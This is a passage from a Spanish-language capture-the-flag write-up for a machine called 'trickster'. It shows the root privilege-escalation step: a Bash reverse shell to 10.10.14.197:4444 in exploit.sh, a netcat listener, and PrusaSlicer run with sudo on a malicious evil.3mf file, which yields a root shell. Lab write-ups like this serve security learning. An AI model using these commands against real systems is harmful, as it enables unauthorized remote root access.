Hay que modificar el archivo exploit.sh que es una reverse shell en Bash, donde indico mi ip y el puerto por el que quiero entablar la reverse shell, en este caso el 4444.

1
2
adam@trickster:/tmp$ cat exploit.sh 
/bin/bash -i >& /dev/tcp/10.10.14.197/4444 0>&1

Asigno permisos de ejecución al script exploit.sh

1
adam@trickster:/tmp$ chmod +x exploit.sh

Inicio un listener con netcat por el puerto 4444 para obtener la reverse shell

1
2
nc -lvnp 4444
listening on [any] 4444 ...

Ejecuto prusaslicer con privilegios sudo y cargo el archivo malicioso evil.3mf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
adam@trickster:/tmp$ sudo /opt/PrusaSlicer/prusaslicer -s evil.3mf
10 => Processing triangulated mesh
20 => Generating perimeters
30 => Preparing infill
45 => Making infill
65 => Searching support spots
69 => Alert if supports needed
print warning: Detected print stability issues:

EXPLOIT
Low bed adhesion

Consider enabling supports.
Also consider enabling brim.
88 => Estimating curled extrusions
88 => Generating skirt and brim
90 => Exporting G-code to EXPLOIT_0.3mm_{printing_filament_types}_MK4_{print_time}.gcode

Automaticamente obtengo la reverse shell y consigo escalar mis privilegios a root

1
2
root@trickster:/tmp# whoami
root
Esta entrada está licenciada bajo CC BY 4.0 por el autor.